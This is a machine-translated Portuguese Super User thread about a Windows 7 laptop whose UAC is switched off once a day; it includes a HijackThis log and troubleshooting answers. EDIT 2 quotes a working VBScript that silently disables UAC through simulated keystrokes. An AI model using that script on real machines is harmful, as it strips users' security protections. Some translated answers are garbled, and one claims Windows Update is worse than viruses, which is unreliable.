UAC sendo desativado uma vez ao dia no Windows 7

Question

UAC sendo desativado uma vez ao dia no Windows 7

#1 resposta do (6 votos)
#2 resposta do (5 votos)
#3 resposta do (2 votos)
#4 resposta do (1 votos)
#5 resposta do (0 votos)
#6 resposta do (0 votos)
#7 resposta do (0 votos)
#8 resposta do (0 votos)
#9 resposta do (-1 votos)

10

Eu tenho problema estranho no meu laptop HP. Isso começou a acontecer recentemente. Sempre que eu inicio a máquina, o Windows 7 Action Center exibe o seguinte aviso:

You need to restart your computer for UAC to be turned off.

Na verdade, isso não acontece se acontecer uma vez em um dia específico. Por exemplo, quando eu começo a máquina de manhã, aparece; mas nunca aparece nas reinicializações subseqüentes dentro daquele dia. No dia seguinte, a mesma coisa acontece novamente.

Eu nunca desabilito o UAC, mas obviamente algum rootkit ou vírus causa isso. Assim que obtiver este aviso, dirijo-me às definições do UAC e reative o UAC para ignorar este aviso. Esta é uma situação incômoda, pois não posso consertar isso.

Primeiro, executei uma varredura completa no computador em busca de qualquer atividade provável de vírus e malware / rootkit, mas o TrendMicro OfficeScan afirmou que nenhum vírus foi encontrado. Eu fui a um antigo ponto de restauração usando o Windows System Restore, mas o problema não foi resolvido.

O que tentei até agora (que não encontrei o rootkit):

TrendMicro OfficeScan Antivirus
AVAST
Anti-malware do Malwarebytes
Ad-Aware
Vipre Antivirus
GMER
TDSSKiller (Kaspersky Labs)
HiJackThis
RegRuns
UnHackMe
SuperAntiSpyware Portable
Tizer Rootkit Razor ( * )
Sopro Anti-Rootkit
SpyHunter 4
ComboFix

Não há outras atividades estranhas na máquina. Tudo funciona bem, exceto este incidente bizarro.

Qual poderia ser o nome desse rootkit chato? Como posso detectá-lo e removê-lo?

EDIT: Abaixo está o arquivo de log gerado pelo HijackThis:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 13:07:04, on 17.01.2011
Platform: Windows 7  (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16700)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.Exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\VolCtrl.exe
C:\Program Files\LightningFAX\LFclient\lfsndmng.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Microsoft Office Communicator\communicator.exe
C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe
C:\Program Files\Trend Micro\OfficeScan Client\PccNTMon.exe
C:\Program Files\Microsoft LifeCam\LifeExp.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\mimio\mimio Studio\system\aps_tablet\atwtusb.exe
C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\userx\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://www.yaysat.com.tr/proxy/proxy.pac
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Babylon IE plugin - {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM.0\AdobeARM.exe"
O4 - HKLM\..\Run: [lfsndmng] C:\Program Files\LightningFAX\LFclient\LFSNDMNG.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Communicator] "C:\Program Files\Microsoft Office Communicator\communicator.exe" /fromrunkey
O4 - HKLM\..\Run: [AgentUiRunKey] "C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe" -ni -sss -e http://localhost:16386/
O4 - HKLM\..\Run: [OfficeScanNT Monitor] "C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe" -HideWindow
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - Global Startup: mimio Studio.lnk = C:\Program Files\mimio\mimio Studio\mimiosys.exe
O8 - Extra context menu item: Microsoft Excel'e &Ver - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm
O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O9 - Extra 'Tools' menuitem: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O16 - DPF: {00134F72-5284-44F7-95A8-52A619F70751} (ObjWinNTCheck Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/WinNTChk.cab
O16 - DPF: {08D75BC1-D2B5-11D1-88FC-0080C859833B} (OfficeScan Corp Edition Web-Deployment SetupCtrl Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/setup.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\Software\..\Telephony: DomainName = yaysat.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = yaysat.com
O18 - Protocol: qcom - {B8DBD265-42C3-43E6-B439-E968C71984C6} - C:\Program Files\Common Files\Quest Shared\CodeXpert\qcom.dll
O22 - SharedTaskScheduler: FencesShellExt - {1984DD45-52CF-49cd-AB77-18F378FEA264} - C:\Program Files\Stardock\Fences\FencesMenu.dll
O23 - Service: Andrea ADI Filters Service (AEADIFilters) - Andrea Electronics Corporation - C:\Windows\system32\AEADISRV.EXE
O23 - Service: AgentService - Iron Mountain Incorporated - C:\Program Files\Iron Mountain\Connected BackupPC\AgentService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - LSI Corporation - C:\Program Files\LSI SoftModem\agrsmsvc.exe
O23 - Service: BMFMySQL - Unknown owner - C:\Program Files\Quest Software\Benchmark Factory for Databases\Repository\MySQL\bin\mysqld-max-nt.exe
O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: OfficeScanNT RealTime Scan (ntrtscan) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe
O23 - Service: SMS Task Sequence Agent (smstsmgr) - Unknown owner - C:\Windows\system32\CCM\TSManager.exe
O23 - Service: Check Point VPN-1 Securemote service (SR_Service) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Service.exe
O23 - Service: Check Point VPN-1 Securemote watchdog (SR_Watchdog) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Watchdog.exe
O23 - Service: Trend Micro Unauthorized Change Prevention Service (TMBMServer) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\..\BM\TMBMSRV.exe
O23 - Service: OfficeScan NT Listener (tmlisten) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe
O23 - Service: OfficeScan NT Proxy Service (TmProxy) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\TmProxy.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

--
End of file - 8204 bytes

Como sugerido em this very pergunta semelhante , executei verificações completas (+ verificações de tempo de inicialização) com RegRun e UnHackMe, mas eles também não encontraram nada. Examinei cuidadosamente todas as entradas no Visualizador de Eventos, mas não há nada de errado.

Agora eu sei que há um trojan oculto (rootkit) na minha máquina que parece se disfarçar com bastante sucesso. Observe que eu não tenho a chance de remover o HDD ou reinstalar o sistema operacional, pois esta é uma máquina de trabalho sujeita a determinadas políticas de TI em um domínio da empresa.

Apesar de todas as minhas tentativas, o problema ainda permanece. Eu estritamente preciso de um método de ponto-a-ponto ou um removedor de rootkit pukka para remover o que quer que seja. Eu não quero mexer com as configurações do sistema, ou seja, desabilitando auto corre um por um, bagunçando o registro, etc.

EDIT 2: Encontrei um artigo que está intimamente relacionado ao meu problema:

O malware pode desativar o UAC no Windows 7; "Por design", diz a Microsoft . Agradecimento especial (!) À Microsoft.

No artigo, um código VBScript é fornecido para desabilitar o UAC automaticamente:

'// 1337H4x Written by _____________ 
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

Infelizmente, isso não me diz como posso me livrar desse código malicioso em execução no meu sistema.

EDIT 3: Ontem à noite, deixei o laptop aberto por causa de uma tarefa SQL em execução. Quando cheguei de manhã, vi que o UAC estava desligado. Então, suspeito que o problema não esteja relacionado à inicialização. Está acontecendo uma vez por dia, com certeza, não importa se a máquina foi reinicializada.

EDIT 4: Hoje, iniciei imediatamente o "Process Monitor" assim que o Windows foi iniciado para capturar o culpado (graças a @harrymc pela ideia). Às 9:17, o controle deslizante do UAC foi deslocado para baixo (o Windows 7 Action Center deu o aviso). Eu investiguei todas as ações do registro entre 9:16 e 9:18. Salvei o arquivo de log do Process Monitor (70 MB contendo apenas esse intervalo de 2 minutos). Há muitas entradas EnableLUA = 0 (e as outras). Estou postando as capturas de tela das janelas de propriedades dos primeiros 4 abaixo. Ele diz que svchost.exe está fazendo isso e fornece alguns números de thread e PID. Eu não sei o que devo inferir sobre eles:

windows-7 malware rootkit uac virus

por Mehper C. Palavuzlar 20.03.2017 / 11:17

9 respostas

5

No meu caso, era uma política de domínio que estava sendo aplicada uma vez por dia. Mesmo problema. O diagnóstico foi mais fácil porque o desligamento do UAC ocorreu apenas ao efetuar login no domínio ou ao conectar-se por VPN. Assim, descobriu-se que a política de domínio incluía algum script para desativar o UAC. Entrei em contato com os administradores do meu sistema e eles confirmaram isso. Então é melhor você consultar seus administradores de domínio ou validar políticas e scripts locais de perfil se você não estiver no domínio.

por 25.01.2013 / 12:14

2

Opção 1: desabilitar todos os programas na inicialização. (Iniciar > Executar > Msconfig. Desativar tudo durante o arranque).

Opção 2: Instale o AVAST Home Edition e agende uma verificação de tempo de inicialização. Melhor ainda, desconecte o disco rígido da sua máquina e conecte-o a outro e faça a varredura a partir dele usando o AVAST.

Opção 3. Outra opção é executar o HijackThis. Gere o relatório e compartilhe-o aqui para análise. link

por 17.01.2011 / 10:56

1

Instale o Microsoft Security Essentials e faça uma verificação completa do sistema. Como o MSE faz uso de APIs e ganchos do sistema operacional, ele pode localizar o malware, se na verdade for algum tipo de malware. Além disso, se o MSE não puder realmente instalar ou executar, saberemos com certeza se o sistema está comprometido.

Desde que você executou tantos programas AV e Anti-Malware para verificar seu sistema, duvido muito que seu computador tenha sido comprometido. Em vez de instalar os programas antivírus e antimalware e fazer uma verificação de inicialização, use outro computador para verificar a unidade. Anexe a unidade a outro sistema como escravo e execute as varreduras. Você deve fazer a verificação de inicialização inicializando de um CD ou DVD e não do próprio disco rígido, pois isso impede que o sistema operacional seja iniciado e que o root-kit seja executado durante a verificação real.

Honestamente, se você tiver certeza de que seu sistema foi composto por um root-kit, então, use o Nuke no disco rígido e comece do zero. Peça ao seu departamento de TI para fazer isso. Essa é a única maneira infalível de ter certeza de que seu sistema está limpo.

por 06.02.2011 / 10:11

0

Eu recomendo que você crie outra conta de usuário no seu computador. Não faça dessa conta um administrador; mantenha-o como um usuário padrão. Use essa nova conta em vez de sua conta de administrador. Se você precisar de direitos de administrador, o UAC sempre solicitará suas credenciais de administrador. Dessa forma, o malware não poderá desativar o UAC e executar coisas malignas ...

Isso não eliminará o vírus, mas ao menos impedirá que ele piore. Então, quando o seu antivírus receber novas definições para detectá-lo, ele poderá removê-lo.

por 07.02.2011 / 00:25

0

Antes de passar para medidas mais complicadas, instale o AVG Anti-Virus Free Edition 2011 . Deixe-o executar uma varredura de computador inteira. Recentemente, tive um problema semelhante, e nenhum outro programa antivírus, exceto o já mencionado, pôde corrigi-lo com suas medidas de Anti-Rootkit.

por 09.02.2011 / 05:55

0

Esta é uma questão bastante interessante. Eu teria que dizer que isso seria causado por uma ou duas questões diferentes:

1) A maioria das pessoas suspeita de um vírus, e com razão, os vírus adoram entrar no Windows e mexer nas configurações.

Você tem uma quantidade abrangente de varreduras já executadas. Qualquer vírus deve ser pego pelos que já estão sendo executados, então acredito que é um vírus do Windows.

2) O Windows está cheio. Eu recomendo que você execute uma verificação de disco no seu computador. Dois métodos diferentes que geram resultados semelhantes.

- Abra o meu computador e, em seguida, clique com o botão direito do mouse no disco rígido do qual o Windows carrega. Em seguida, selecione a aba de ferramentas e clique no botão que diz Disk Check [or something similar]. Agora marque as duas caixas de opção se elas já não estiverem. Seu computador deve pedir-lhe para reiniciar o computador, se isso não acontecer, você não marcou as caixas de opção. Deixe essa verificação ser executada. Deve limpar todas as aves dentro da sua instalação do Windows.

Agora, se essa verificação falhar, insira o disco de instalação do sistema operacional. Se estiver usando XP, aperte R quando a tela azul aparecer perguntando qual tarefa você deseja fazer. Agora, selecione em qual disco rígido seu sistema operacional está e pressione Enter após digitar o número apropriado. Em seguida, insira a senha da conta do Administrador [geralmente isso está em branco]. Agora, entre no console de comando: chkdsk / r

isso deve fazer a mesma verificação, mas pode corrigir mais problemas porque a verificação está sendo executada no disco de instalação.

se estiver executando a varredura de uma máquina VISTA ou SETE, insira o disco e selecione a opção de reparo. Depois, aperte cancel e deve abrir uma nova janela, na qual você pode fazer mais operações. A última opção deve dizer "Janela do console" ou algo do tipo.

entrar no console de comando "chkdsk / r C:"

Espero que isso ajude.

por 10.02.2011 / 02:09

0

Acabei de encontrar esta mesma msg. esta manhã. Java tem tentado atualizar-se por algum tempo agora, então eu mudei as configurações de notificação para "não notificar" e imediatamente recebeu a msg que eu tive que reiniciar meu cpu para desligar o controle. Eu entrei e redefini o nível de notificação e o problema foi resolvido. Espero que ajude

por 25.06.2014 / 14:34

-1

Ganhe 10 usando o Malwarebytes. Malware aparentemente estava desligando o UAC na inicialização. Parou de carregá-lo na inicialização e o problema pareceu resolver. Em seguida, a inicialização foi ajustada para atrasar a configuração do Malwarebytes e pareceu funcionar.

por 16.08.2015 / 14:07

Tags windows-7 malware rootkit uac virus

Reinicita automaticamente a aplicação quando fecha Qual algoritmo de alocação de blocos o NTFS usa?

score 6 · Accepted Answer

Você deve primeiro verificar se o serviço da Central de Segurança pode iniciar e, se não, qual das suas dependências é a culpada. Procure também mensagens de erro no Visualizador de Eventos.

Se você tem a impressão de que seu computador está infectado, as possíveis soluções podem ser:

Como reparar arquivos do sistema Windows 7 com o Verificador de arquivos do sistema .
Reparo de inicialização: Como reparar facilmente o Windows 7 Problemas de inicialização usando o reparo de inicialização .
O último recurso é reformatar o disco rígido e reinstalar o Windows.
No seu caso, isso pode se aplicar: Realizando uma Recuperação do Sistema HP no Windows Vista .

Apenas para observar que o Windows é capaz de se destruir sem qualquer ajuda, é por isso que o Windows Update é mais perigoso do que qualquer vírus. O Reparo de Inicialização pode corrigir o problema nesse caso reiniciando o Windows, sem exigir que os aplicativos sejam reinstalados.

Se você realmente acha que o problema é um vírus e deseja saber mais sobre o que está acontecendo em seu computador, precisará descobrir duas coisas:

Qual alteração está sendo feita no seu sistema,
Qual programa isso muda?

Para o primeiro, se for uma alteração de registro, a chave provavelmente é HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System , item EnableLUA , cujo valor é 0 para Desativar e 1 para Ativação.

Depois de localizar a alteração no seu sistema, você pode usar o Process Monitor e seu Ative a opção Boot Logging (consulte a ajuda) para registrar todos os acessos à chave.

Primeiro, inicializo no modo de segurança e vejo se isso também está acontecendo. Caso contrário, outro vetor de ataque é usar Autoruns para desabilitar itens de inicialização em uma pesquisa binária para o produto (já que este pode ser um produto legítimo causando o problema, em vez de um vírus).